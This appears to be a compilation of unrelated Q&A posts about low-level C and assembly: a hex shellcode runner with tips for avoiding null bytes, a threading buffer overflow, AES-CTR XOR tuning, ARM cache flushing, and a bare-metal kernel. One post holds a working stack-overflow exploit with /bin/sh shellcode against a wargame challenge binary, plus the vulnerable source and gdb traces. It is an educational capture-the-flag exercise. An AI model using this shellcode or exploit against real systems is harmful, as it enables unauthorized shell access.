I try to make a Programm where you put in some assembled assembly in hex and run it.
With simple instructions like int3 it works, but when I try to exit from the programm with a syscall it doesnt work.
I assembled it with rasm2
mov eax, 1
mov ebx, 12
int 0x80
and then put it as an argument ./Programm b801000000bb0c000000cd80 1
but i get a segfault.
Here is my code:
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
char *base16dec(char *b16str) {
size_t stingrlength = strlen(b16str);
char *decodedstr = malloc(stingrlength / 2);
for (size_t i = 0; i < stingrlength; i += 2) {
u_int8_t num = 0;
char stringIn[3];
stringIn[0] = b16str[i];
stringIn[1] = b16str[i+1];
stringIn[2] = 0;
sscanf(stringIn, "%hhx", &num);
decodedstr[i/2] = (char) num;
}
return decodedstr;
}
this decodes the hex string
int main(int argc, char *argv[]) {
char *dirstr = "XXXXXX";
char dir[7];
strcpy(dir, dirstr);
int fd = mkstemp(dir);
if (fd == -1) {
dirstr = "/tmp/XXXXXX";
char dir[12];
strcpy(dir, dirstr);
fd = mkstemp(dir);
}
unlink(dir);
this creates the tmp file where the assembly is stored
char *stringIn;
if (argc == 2) {
stringIn = malloc(strlen(argv[1]));
strcpy(stringIn, argv[1]);
} else if (argc == 3) {
u_int8_t num = 0;
sscanf(argv[2], "%hhu", &num);
if (num == 1) {
char *done = base16dec(argv[1]);
stringIn = malloc(strlen(done));
strcpy(stringIn, done);
} else {
stringIn = malloc(strlen(argv[1]));
strcpy(stringIn, argv[1]);
}
} else {
stringIn = malloc(1024);
scanf("%s", stringIn);
char *done = base16dec(stringIn);
stringIn = malloc(strlen(done));
strcpy(stringIn, done);
}
this parses and copies the input to stringIn
ftruncate(fd, strlen(stringIn));
u_int8_t *code = mmap(NULL, strlen(stringIn), PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE , fd, 0);
this expands the tmp file and makes it executable and creates a pointer to it named code
for (int i = 0; i < 1024; i++) {
code[i] = (u_int8_t) stringIn[i];
}
this copies the assembly bytes into code
#if __x86_64__
__asm__(
"mov %0, %%rbx\n"
"jmp *%%rbx"
:
: "g" (code)
: "memory"
);
#elif __i386__
__asm__(
"mov %0, %%ebx\n"
"jmp *%%ebx"
:
: "r" (code)
);
#else
#endif
this jumps to the the assembly
return 0;
}
EDIT:
I can't debug the shellcode using gdb
I use 64bit Linux Mint
I tried to copy 0 using strcpy
Since this is a shellcode you can't have null bytes. In your code you have 2 movs with immediates that are padded to 32-bits
mov eax, 1
mov ebx, 12
Which encodes as B801000000BB0C000000, when C hits the null bytes it thinks the string has ended so it only ends up copying part of the instruction and then it executes garbage.
Instead you'll need to use:
xor eax, eax
inc eax
xor ebx, ebx
mov bl, 12
This will provide the values you want for your system call and does not encode as any null bytes.
Related
Here is my code,
#include <time.h>
#include <pthread.h>
#include <string.h>
#include <inttypes.h>
#include <unistd.h>
unsigned sleep(unsigned sec) ;
void get_time(char *buf) {
time_t t = time(NULL) ;
struct tm tm = *localtime(&t) ;
sprintf(buf,"%02d:%02d:%02d", tm.tm_hour, tm.tm_min, tm.tm_sec) ;
}
void *calculateSize(uint64_t size, char *buf) {
if (size < 1024ULL){
sprintf(buf, "%.1f %s", (float) size, "B") ;
return NULL ;
}
else if (size < (1024 * 1024)) {
sprintf(buf, "%.1f %s", (float) size/1024ULL, "KiB") ;
return NULL ;
}
else if (size > (1024 * 1024)) {
sprintf(buf, "%.1f %s", (float) size/(1024ULL * 1024ULL), "MiB") ;
return NULL ;
}
strcpy(buf, "0") ;
return NULL ;
}
void * run(char *interface, char * download_buf, char * upload_buf) {
unsigned long rdiff,tdiff ;
unsigned long rx_old,rx_new ;
unsigned long tx_old,tx_new ;
char buf[10] ;
char rx_file[512] ;
char tx_file[512] ;
sprintf(rx_file, "/sys/class/net/%s/statistics/rx_bytes", interface) ;
sprintf(tx_file, "/sys/class/net/%s/statistics/tx_bytes", interface) ;
FILE *rf = fopen(rx_file,"r") ;
FILE *tf = fopen(tx_file,"r") ;
if (rf != NULL && tf != NULL) {
fscanf(rf,"%lu", &rx_old) ;
fscanf(tf,"%lu", &tx_old) ;
fclose(rf) ;
fclose(tf) ;
}
else {
return NULL ;
}
sleep(1) ;
rf = fopen(rx_file,"r") ;
tf = fopen(tx_file,"r") ;
if (rf != NULL && tf != NULL) {
fscanf(rf,"%lu", &rx_new) ;
fscanf(tf,"%lu", &tx_new) ;
rdiff = rx_new - rx_old ;
tdiff = tx_new - tx_old ;
fclose(rf) ;
fclose(tf) ;
}
else {
return NULL ;
}
calculateSize(rdiff,buf) ;
strcpy(download_buf,buf) ;
calculateSize(tdiff,buf) ;
strcpy(upload_buf,buf) ;
return NULL ;
}
void *net_speed(void *thread_speed_args ) {
char* iface = *(char **)thread_speed_args ;
char carrier_file[512] ;
sprintf(carrier_file,"/sys/class/net/%s/carrier", iface) ;
printf("Reading from %s\n", carrier_file) ;
while(1) {
if( access( carrier_file, F_OK ) == 0 ) {
run(iface, ((char **)thread_speed_args)[1], ((char **)thread_speed_args)[2]) ;
}
else {
sprintf(((char **)thread_speed_args)[1],"000 B") ;
sprintf(((char **)thread_speed_args)[2],"000 B") ;
sleep(1) ;
}
}
return NULL ;
}
int main(int argc, char *argv[]) {
char time_buf[10] ; //hh:mm:ss : 8 char + 1 null terminator char
char download_buf[8],upload_buf[8] ;
char* thread_speed_args[3] = { argv[1], download_buf, upload_buf } ;
pthread_t thread_speed ;
pthread_create(&thread_speed, NULL, net_speed, thread_speed_args) ;
pthread_detach(thread_speed) ;
while(1){
get_time(time_buf) ;
printf("Down:%s Up:%s %s\n", thread_speed_args[1], thread_speed_args[2], time_buf) ;
fflush(stdout) ;
sleep(1) ;
}
}
I am using a thread to continuously monitor my wireless data transfer rate on an interface, I am also printing the time along with the transfer rate. I am just experimenting with threads, forgive me if my programming logic is bad.
I notice that when I do a speed test the output or print becomes all messed up like below
Down:0.0 B Up:0.0 B 23:49:03
Down:0.0 B Up:0.0 B 23:49:04
Down:0.0 B Up:0.0 B 23:49:05
Down:17.0 KiB9.2 KiB Up:9.2 KiB 23:49:06
Down:5.3 KiB Up:6.5 KiB 23:49:07
Down:3.4 KiB Up:4.1 KiB 23:49:08
Down:400.6 Ki20.3 KiB23:49:09 Up:20.3 KiB23:49:09 23:49:09
Down:918.6 Ki49.6 KiB23:49:10 Up:49.6 KiB23:49:10 23:49:10
Down:912.8 Ki53.5 KiB23:49:11 Up:53.5 KiB23:49:11 23:49:11
Down:959.2 Ki32.2 KiB23:49:12 Up:32.2 KiB23:49:12 23:49:12
Down:711.5 Ki33.8 KiB23:49:13 Up:33.8 KiB23:49:13 23:49:13
See the last few lines?
Could anyone tell me what is happening here? How do I correct it?
This is happening because you're accessing a common resource in multiple threads simultaneously - in this case, the STDOUT handle. You'll need to synchronize your threads when outputting the information to the console - the easiest way is using mutexes. You can read more here.
While your threads lack any kind of synchonization (which will randomly garble your output in some rare cases) this isn't even your problem.
Here is your problem:
char download_buf[8],upload_buf[8] ;
char buf[10] ;
strcpy(download_buf,buf) ;
strcpy(upload_buf,buf) ;
You are copying an up to 9 character string into a 7 char string so that overflows the buffer. And since the buffers happen to be next to each other on the stack the second strcpy will overwrite the 0 terminator of the first string. Same with the time_buf overwriting the 0 terminator of the second string.
Overall a whole lot of undefined behavior due to buffer overflows.
I have some code where I step through two buffers and XOR one against the placing the results in a third. Specifically, this is a buffer of data, a key stream buffer, and a destination buffer.
The function in question is (in full)
static int
ssh_aes_ctr(EVP_CIPHER_CTX *ctx, u_char *dest, const u_char *src,
LIBCRYPTO_EVP_INL_TYPE len)
{
typedef union {
#ifdef CIPHER_INT128_OK
__uint128_t *u128;
#endif
uint64_t *u64;
uint32_t *u32;
uint8_t *u8;
const uint8_t *cu8;
uintptr_t u;
} ptrs_t;
ptrs_t destp, srcp, bufp;
uintptr_t align;
struct ssh_aes_ctr_ctx_mt *c;
struct kq *q, *oldq;
int ridx;
u_char *buf;
if (len == 0)
return 1;
if ((c = EVP_CIPHER_CTX_get_app_data(ctx)) == NULL)
return 0;
q = &c->q[c->qidx];
ridx = c->ridx;
/* src already padded to block multiple */
srcp.cu8 = src;
destp.u8 = dest;
do { /* do until len is 0 */
buf = q->keys[ridx];
bufp.u8 = buf;
/* figure out the alignment on the fly */
#ifdef CIPHER_UNALIGNED_OK
align = 0;
#else
align = destp.u | srcp.u | bufp.u;
#endif
/* xor the src against the key (buf)
* different systems can do all 16 bytes at once or
* may need to do it in 8 or 4 bytes chunks
* worst case is doing it as a loop */
#ifdef CIPHER_INT128_OK
if ((align & 0xf) == 0) {
destp.u128[0] = srcp.u128[0] ^ bufp.u128[0];
} else
#endif
/* 64 bits */
if ((align & 0x7) == 0) {
destp.u64[0] = srcp.u64[0] ^ bufp.u64[0];
destp.u64[1] = srcp.u64[1] ^ bufp.u64[1];
/* 32 bits */
} else if ((align & 0x3) == 0) {
destp.u32[0] = srcp.u32[0] ^ bufp.u32[0];
destp.u32[1] = srcp.u32[1] ^ bufp.u32[1];
destp.u32[2] = srcp.u32[2] ^ bufp.u32[2];
destp.u32[3] = srcp.u32[3] ^ bufp.u32[3];
} else {
/*1 byte at a time*/
size_t i;
for (i = 0; i < AES_BLOCK_SIZE; ++i)
dest[i] = src[i] ^ buf[i];
}
/* inc/decrement the pointers by the block size (16)*/
destp.u += AES_BLOCK_SIZE;
srcp.u += AES_BLOCK_SIZE;
/* Increment read index, switch queues on rollover */
if ((ridx = (ridx + 1) % KQLEN) == 0) {
oldq = q;
/* Mark next queue draining, may need to wait */
c->qidx = (c->qidx + 1) % numkq;
q = &c->q[c->qidx];
pthread_mutex_lock(&q->lock);
while (q->qstate != KQFULL) {
pthread_cond_wait(&q->cond, &q->lock);
}
q->qstate = KQDRAINING;
pthread_cond_broadcast(&q->cond);
pthread_mutex_unlock(&q->lock);
/* Mark consumed queue empty and signal producers */
pthread_mutex_lock(&oldq->lock);
oldq->qstate = KQEMPTY;
pthread_cond_broadcast(&oldq->cond);
pthread_mutex_unlock(&oldq->lock);
}
} while (len -= AES_BLOCK_SIZE);
c->ridx = ridx;
return 1;
}
Running this through vtune I find that the destp.u128[0] = srcp.u128[0] ^ bufp.u128[0]; line consumes 4% of the cpu time.
The assembly for this line is
shl $0x4, %rax
addq (%rsp), %rax
movq (%rax), %rdx
xorq (%rbx), %rdx
movq 0x8(%rax), %rax
xorq 0x8(%rax), %rax
movq %rax, 0x8(%r12)
The xorq (%rbx), %rdx is consuming 3.5% of the CPU time. What I am wondering is if I could improve performance by vectorizing the data being xor'd and then using intrinsics to perform the xor. I don't have much (read any) real experience in using intrinsics but I'm willing to learn. I just don't know if this code, as is, is about as good as I can expect. Any pointers would be appreciated.
Thanks
i am working on a Cortex-A72 (Armv8) and i need to implement this pseudocode:
put addr1 into X9
put addr2 into X10
for i := 0 to N − 1 do
STR X0, [X9]
STR X0, [X10]
DC CVAC, X9
DC CVAC, X10
Following my C code:
int main(){
unsigned char temp = 0xff;
unsigned char *mem;
mem = mmap(NULL, BUF_SIZE, PROT_READ | PROT_WRITE,MAP_ANON | MAP_PRIVATE, -1, 0);
if (mem == MAP_FAILED){
perror("mmap()");
return 1;
}
memset(mem,0xff,BUF_SIZE);
/* Select two random addresses within memory pool*/
size_t offset1 = (rand()<<12)%BUF_SIZE;
size_t offset2 = (rand()<<12)%BUF_SIZE;
unsigned char *addr1 = (unsigned char*) (mem+offset1);
unsigned char *addr2= (unsigned char*) (mem+offset2)
for (int i = 0; i < 10000; i++){
asm volatile("str %x1, %x0" : "=m"(*addr1) : "r"(temp));
asm volatile("str %x1, %x0" : "=m"(*addr2) : "r"(temp));
__asm__ __volatile__("dc cvac, %0\n\t" : : "r" (addr1));
__asm__ __volatile__("dc cvac, %0\n\t" : : "r" (addr2));
}
.
.
.
}
I just want to know if I am using the assembly code in the right way.
The goal is to access data directly in physical memory, bypassing cache.
Hi i'm really stuck on this problem: here are my code and below the code i try to overflow:
#include <stdio.h>
#define B 145 // 141 for ex overflow
#define A 0
char sc[]=
"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3"
"\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";
void main()
{
char *env[2] = {sc, NULL};
char buf[B];
int i;
int *ap = (int*)(buf + A);
int ret = 0xbffffffa - strlen(sc) - strlen("/challenge/app-systeme/ch10/ch10");
FILE *file;
for (i = 0; i < B - 4; i += 4)
{
if (i == 136)
*ap++ = 0xbffffc64;
else if (i == 98)
{
*ap++ = "/challenge/app-systeme/.passwd";//edx
}
else
{
if (i >= 50)
*ap++ = 0x42424242;
else if (i < 50)
*ap++ = 0xbfffffb1;//0x45454545;
}
}
file = fopen("/tmp/toto/COUCOU", "a+");
fprintf(file, "%s%s", "USERNAME=", buf);
fclose(file);
printf("AAAAWESOME");
execle("/challenge/app-systeme/ch10/ch10", "ch10", "/tmp/toto/COUCOU", NULL, env);
}
Vulnerable code:
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <ctype.h>
#include <unistd.h>
#include <sys/types.h>
#define BUFFER 512
struct Init
{
char username[128];
uid_t uid;
pid_t pid;
};
void cpstr(char *dst, const char *src)
{
for(; *src; src++, dst++)
{
*dst = *src;
}
*dst = 0;
}
void chomp(char *buff)
{
for(; *buff; buff++)
{
if(*buff == '\n' || *buff == '\r' || *buff == '\t')
{
*buff = 0;
break;
}
}
}
struct Init Init(char *filename)
{
FILE *file;
struct Init init;
char buff[BUFFER+1];
if((file = fopen(filename, "r")) == NULL)
{
perror("[-] fopen ");
exit(0);
}
memset(&init, 0, sizeof(struct Init));
init.pid = getpid();
init.uid = getuid();
while(fgets(buff, BUFFER, file) != NULL)
{
chomp(buff);
if(strncmp(buff, "USERNAME=", 9) == 0)
{
cpstr(init.username, buff+9);
}
}
fclose(file);
return init;
}
int main(int argc, char **argv)
{
struct Init init;
if(argc != 2)
{
printf("Usage : %s <config_file>\n", argv[0]);
exit(0);
}
init = Init(argv[1]);
printf("[+] Runing the program with username %s, uid %d and pid %d.\n", init.username, init.uid, init.pid);
return 0;
}
Indeed i can't reach eip as gdb usually shows a segfault happening into the loop:
esi is the first register crushed after the overflow but i still don't get what feed him.
It's a buffer size at this point, i can then even fill edi and edx, but still what for ?
Is eip still unreachable ?
Well typically :
gdb$ r
process 14534 is executing new program: /challenge/app-systeme/ch10/ch10
Program received signal SIGSEGV, Segmentation fault.
--------------------------------------------------------------------------[regs]
EAX: 0x00000000 EBX: 0xB7FCFFF4 ECX: 0x42424242 EDX: 0x42424242 o d I t s z a P c
ESI: 0xBFFFFC64 EDI: 0x000001FF EBP: 0xBFFFFC64 ESP: 0xBFFFF8EC EIP: 0xB7E9CD88
CS: 0073 DS: 007B ES: 007B FS: 0000 GS: 0033 SS: 007B
--------------------------------------------------------------------------[code]
=> 0xb7e9cd88: mov ecx,DWORD PTR [edx+0x8]
0xb7e9cd8b: mov edx,DWORD PTR [edx]
0xb7e9cd8d: cmp eax,ecx
0xb7e9cd8f: cmovg eax,ecx
0xb7e9cd92: test edx,edx
0xb7e9cd94: jne 0xb7e9cd88
0xb7e9cd96: repz ret
0xb7e9cd98: nop
--------------------------------------------------------------------------------
0xb7e9cd88 in ?? () from /lib/i386-linux-gnu/libc.so.6
gdb$ bt
#0 0xb7e9cd88 in ?? () from /lib/i386-linux-gnu/libc.so.6
#1 0xb7e9cdc4 in ?? () from /lib/i386-linux-gnu/libc.so.6
#2 0xb7e9d2e4 in __uflow () from /lib/i386-linux-gnu/libc.so.6
#3 0xb7e90d3a in _IO_getline_info () from /lib/i386-linux-gnu/libc.so.6
#4 0xb7e90c83 in _IO_getline () from /lib/i386-linux-gnu/libc.so.6
#5 0xb7e8fc20 in fgets () from /lib/i386-linux-gnu/libc.so.6
#6 0x08048685 in Init (filename=0xbfffffb1 "/tmp/toto/COUCOU") at binary10.c:56
#7 0x08048716 in main (argc=0x2, argv=0xbffffed4) at binary10.c:75
Well, it seems I forgot to mention the partial RELRO state of the binary.
Anymore light is welcome .
(gdb) disas __uflow
Dump of assembler code for function __uflow:
0xb7e9d270 <+0>: push %esi
0xb7e9d271 <+1>: push %ebx
...
0xb7e9d37c <+268>: lea 0x0(%esi,%eiz,1),%esi
=> 0xb7e9d380 <+272>: movzbl (%edx),%eax
0xb7e9d383 <+275>: add $0x1,%edx
...
0xb7e9d3b3 <+323>: call 0xb7e92ca0
0xb7e9d3b8 <+328>: jmp 0xb7e9d2b1 <__uflow+65>
End of assembler dump.
(gdb) x/i $eax
0xb7e9c588 <_IO_file_overflow+424>: add %bh,-0x1(%eax)
(gdb) vim ok
Undefined command: "vim". Try "help".
(gdb) x/i $edx
0x806c000: Cannot access memory at address 0x806c000
(gdb)
Something can detect the overflow ?
Well, this is resolved. But trust me i don't have a clue of what i've done, and if anybody could teach us all a lesson he'd be Welcome.
I didn't analyze it in detail, but it seems you are not overflowing init in main(), you are overflowing init in Init(), but its proving resilient to overflow because theres a 513 bytes buffer reserved right after it, spacing you from the sensitive call stack information you want to attack.
Once Init() returns this struct to main() through a copy operation, only sizeof(struct Init) bytes are copied, so its not cascading the vulnerability to the function that you want to attack.
I believe if you want to trigger the vulnerability without interference of any of this, you should overwrite main()'s init directly, by passing it to Init() as a pointer, like void Init(char *filename, struct Init *init).
I am making a C kernel from scratch, and I literally just copied this code off of a website because my code wasn't working so I was confused.
void kmain(void)
{
const char *str = "my first kernel";
char *vidptr = (char*)0xb8000; //video mem begins here.
unsigned int i = 0;
unsigned int j = 0;
/* this loops clears the screen
* there are 25 lines each of 80 columns; each element takes 2 bytes */
while(j < 80 * 25 * 2) {
/* blank character */
vidptr[j] = ' ';
/* attribute-byte - light grey on black screen */
vidptr[j+1] = 0x07;
j = j + 2;
}
j = 0;
/* this loop writes the string to video memory */
while(str[j] != '\0') {
/* the character's ascii */
vidptr[i] = str[j];
/* attribute-byte: give character black bg and light grey fg */
vidptr[i+1] = 0x07;
++j;
i = i + 2;
}
return;
}
When I run my kernel, it prints an S to the screen and nothing else. I know my kernel is booting, because if I do
vidptr[0] = 'h';
vidptr[2] = 'e';
vidptr[4] = 'l';
vidptr[6] = 'l';
vidptr[8] = 'o';
it works as expected. What is happening?
EDIT: It might be something with my code that loads the kernel (might not have set up some of the registers) so I will just look into grub and other things.
Try using the volatile keyword with the variable
Ref page: http://wiki.osdev.org/Printing_To_Screen
// note this example will always write to the top
// line of the screen
void write_string( int colour, const char *string )
{
volatile char *video = (volatile char*)0xB8000;
while( *string != 0 )
{
*video++ = *string++;
*video++ = colour;
}
}
For some reason, if I use char str[] = "blabla"; instead of char *str = "blabla"; it works.
First, have you set the SP before jumping Kernel or before running the function? If you have not, please set them appropriately. In your starting function you should set the stack pointer DS, SS; you can use inline assembly at the beginning of the program. Also instead char * p = "Something" you should use char var [] = "Something", or
char var[10];
var[1] = 'S';
var[2] = 'o';
or
char var[] = { 'S', 'o', 'm', 'e', ..., '\0' } ;
My bootloader establishes the GDT and makes the switcthing to 32 bit mode and jumps (jmp 0x8:0x8000) Here 0x8 is my Code segment address in GDT, 0x10 for the DS, SS; so it jumps to kernel. Before I hadn't set the SS, SP, DS and I could not get it printed so I have written this small code:
[bits 32]
MOV AX, 0x10 ; 0x10 points at the new data selector
MOV DS, eax
MOV ES, AX
MOV FS, AX
MOV GS, AX
MOV SS, AX
MOV eax, 0x200000
MOV esp, eax
and compiled it with nasm and added to beginning of the kernel program manually by using a HEX editor program.